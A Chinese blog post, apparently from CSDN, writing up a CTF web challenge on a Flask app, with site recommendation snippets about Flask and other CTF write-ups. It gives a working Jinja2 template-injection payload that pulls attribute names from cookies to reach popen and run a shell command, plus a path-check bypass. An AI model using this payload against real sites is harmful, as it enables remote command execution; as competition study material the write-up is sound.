长安战“疫”--flask

最新推荐文章于 2025-04-09 09:16:22 发布
最新推荐文章于 2025-04-09 09:16:22 发布
阅读量275 收藏
点赞数
文章标签: flask python 后端 ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/122440766
版权

当时都被重定向搞崩溃了,,, 还是自己太菜了,没想到用参数值来绕过

先看注释

大致意思是访问路径以/login开头或者是以.js结尾
查看/static.js本以为有提示,结果啥也没有,那答案一定是在/admin
request.full_path获取当前url,(包含参数)

请求一个http://127.0.0.1:8000/200/?type=10
request.get_full_path()返回的是【/200/?type=10】

访问/admin,得到一个参数name
 

这里不知道都过滤了些什么,试了几种绕过方式都过不去
使用官网给的wp

?name={{((((request|attr(request.cookies.get('aa'))|attr(request.cookies.get('bb'))|list).pop(-1)|attr(request.cookies.get('cc'))()).pop(118)|attr(request.cookies.get('dd'))|attr(request.cookies.get('ee'))).get('popen')('ls').read())}}&a=.js?

Cookie: aa=__class__;bb=__mro__;cc=__subclasses__;dd=__init__;ee=__globals__

参考文章:

长安战“疫”网络安全卫士守护赛官方WriteUp
浅谈flask ssti 绕过原理 

Uzero.
关注
flask-3.0.2-py3-none-any.whl
03-07
在压缩包子文件的文件名称列表中,我们看到有两个文件:flask-3.0.2-py3-none-any.whl.txt和flask-3.0.2-py3-none-any.whl。前者可能是关于这个wheel包的一些说明文档或者日志,后者则是实际的可安装包文件。通常,....
Flask-2.2.2-py3-none-any.whl
02-04
该资源为Flask-2.2.2-py3-none-any.whl,欢迎下载使用哦!
长安 flask
weixin_45751765的博客
01-25 840
0x00 前言 补充flask基础知识 贴文档 request.full_path Requested path as unicode, including the query string. 包含查询字符串的请求路径 直观一点 0x01 复现 注释带hint <div class="center-content error"> <h3>you need login</h3> <!--/admin--&g
长安”网络安全卫士守护赛writeup
qq_53460654的博客
01-09 4255
长安”网络安全卫士守护赛writeup misc 八卦迷宫 得到flag cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang} 西安加油 tcp流里面找到base64编码 在线转为zip解压 拼图得到flag cazy{make_XiAN_great_Again} web RCE_No_Para <?php if(';' === preg_replace('/[^\W]+\((?R)
长安”网络安全卫士守护赛 WriteUp
as you know, nlp is fantasitc!
01-09 2839
长安守护赛 1、RCE_No_Para 参考一篇比较详细的bloghttps://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/#%E6%B3%951%EF%BC%9Agetenv 源码 <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { if(!preg_match('/session|end|next|header|dir
FlaskRequest请求(3)
布鲁斯
11-05 2174
对于web应用,客户端与服务端之间的数据交互至关重要。在 Flask 中由全局的 request 对象来提供这些信息。 1 Request对象属性 Request对象的重要属性如下: 属性 说明 Form 它是一个字典对象,包含表单参数及其值的键和值对。 args 解析查询字符串的内容,它是问号(?)之后的URL的一部分。 Cookies 保存Cookie名称和值的字典对象...
SSTI模板注入(flask) 学习总结
Jay17的博客
10-18 1309
SSTI模板注入(flask) 学习总结
Bootstrap-Flask
Aoki的博客
05-08 2112
Bootstrap-flask Bootstrap-flask4 helper for Flask/Jinja2. Based on Flask-Bootstrap, but lighter and better. 扩展Bootstrap-Flask基于扩展Flask-Bootstrap实现,旨在替代缺乏维护的后者。和Flask-Bootstrap相比,Bootstrap-Flask简化了大部分功...
Flask-RESTful 到 Flask-RESTPlus 再到 Flask-RESTX
极客点儿
01-10 3730
Django 和 Flask 一直都是 Python 开发 Web 的首选,而 Flask 的微内核更适用于现在的云原生微服务框架。但是 Flask 只是一个微型的 Web 引擎,所以我们需要扩展 Flask 使其发挥出更强悍的功能。 Flask-RESTful Flask-RESTful 就是 Flask 扩展中的佼佼者,它增加了对快速构建 RESTful API 的支持,将 Flask 封装了一层,使其更容易、更快速、更便捷的开发 RESTful API。 GitHub:https://github.
Flask----flask-appbuilder + 项目部署
weixin_45228198的博客
05-07 2408
使用gunicorn部署flask应用
Flask数据库操作-Flask-SQLAlchemy
晴天的博客
02-21 4010
Flask数据库操作-Flask-SQLAlchemy
flask-security-admin-example:结合Flask-Security和Flask-Admin的示例
05-01
结合Flask-Security和Flask-Admin的示例史蒂夫·萨波特(Steve Saporta) 2014年4月15日 Flask-Security提供了一种向Flask Web应用程序添加身份验证和授权的便捷方法。 Flask-Admin提供了一种对数据库表执行CRUD操作...
dash-flask-login:一个集成Dash和Flask-Login的插件
02-05
Dash与Flask-Login的集成 介绍 Dash-Flask-Login是一种 ,可与流行的集成以进行用户会话管理。 Dash-Admin旨在即插即用! 提供用户身份验证应该很简单: 身份验证= FlaskLoginAuth(dash_app) 文献资料 目前,请...
flask-dashboard-adminlte:AdminLTE Flask-开源种子项目| 应用种子
02-05
Flask Framework中的AppSeed生成的。 最好的开源管理仪表板和控制面板主题之一。 AdminLTE建立在Bootstrap之上,提供了一系列响应Swift,可重复使用且常用的组件。 产品特点 DBMS:SQLite,PostgreSQL(生产) ...
Flask与 FastAPI 对比:哪个更适合你的 Web 开发?
全栈程序员的开发日常
04-01 1083
对比fastAPI与flask,看下项目中用哪个更方便
Flask + Pear Admin Layui 快速开发管理后台
Dexter's Laboratory
04-06 413
Flask 就不用过多介绍了, Pear Admin Layui 是基于 Layui 的一套管理后台前端开源模板, 主打一个开箱即用, 对于不喜欢 React/Vue 等这些还需要大量学习成本的前端开发者来说, 可以说是相当友好了.项目官网:项目的作者其实也提供了 Flask 集成的项目。
基于Flask的Windows命令大全Web应用技术解析与架构设计
Liu_Bruce的博客
04-05 1204
多分类导航:10个命令分类(如“系统管理”“网络相关”),支持一键切换。结构化展示:每个命令以卡片形式呈现名称、作用、用法及示例。响应式设计:适配PC与移动端,支持流畅的交互体验。
基于FLask的重庆市造价工程信息数据可视化分析系统
qq_53846367的博客
04-05 314
在当今快速发展的建筑工程行业中,造价信息的准确性和时效性对于项目决策具有至关重要的作用。然而,传统的手工收集和整理造价信息的方式不仅效率低下,而且容易出错。为了解决这一问题,急需设计并实现一个关于造价信息分析的可视化系统。该系统利用先进的网络爬虫技术和数据处理算法采集造价信息,并通过Pandas、NumPy等组件进行数据预处理和分析。同时,系统采用BootStrap构建用户友好的界面,使用Flask后端框架处理用户请求,结合Echarts实现数据可视化,使用户能够直观地了解材料价格趋势和分布情况。本系统不仅
基于Flask的Windows事件ID查询系统开发实践
最新发布
Liu_Bruce的博客
04-09 379
高效数据处理:JSON文件+内存缓存即时搜索体验:jQuery+防抖机制现代界面设计:Bootstrap+自定义CSS跨平台兼容:响应式布局方案该方案可作为基础模板扩展至其他数据查询类Web应用的开发,具有快速部署、易于维护和良好扩展性等特点。读者可根据实际需求,结合文中提到的扩展方向进行功能增强,构建更强大的信息查询系统。
Flask-0.3版本压缩包资源下载
资源摘要信息: "Flask-0.3.tar.gz是一个开放源代码的Web应用框架,是Python语言编写的一个轻量级框架,由Armin Ronacher和团队成员共同开发。该版本是Flask框架的一个较早期版本,适用于Python 2.x系列。Flask框架...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值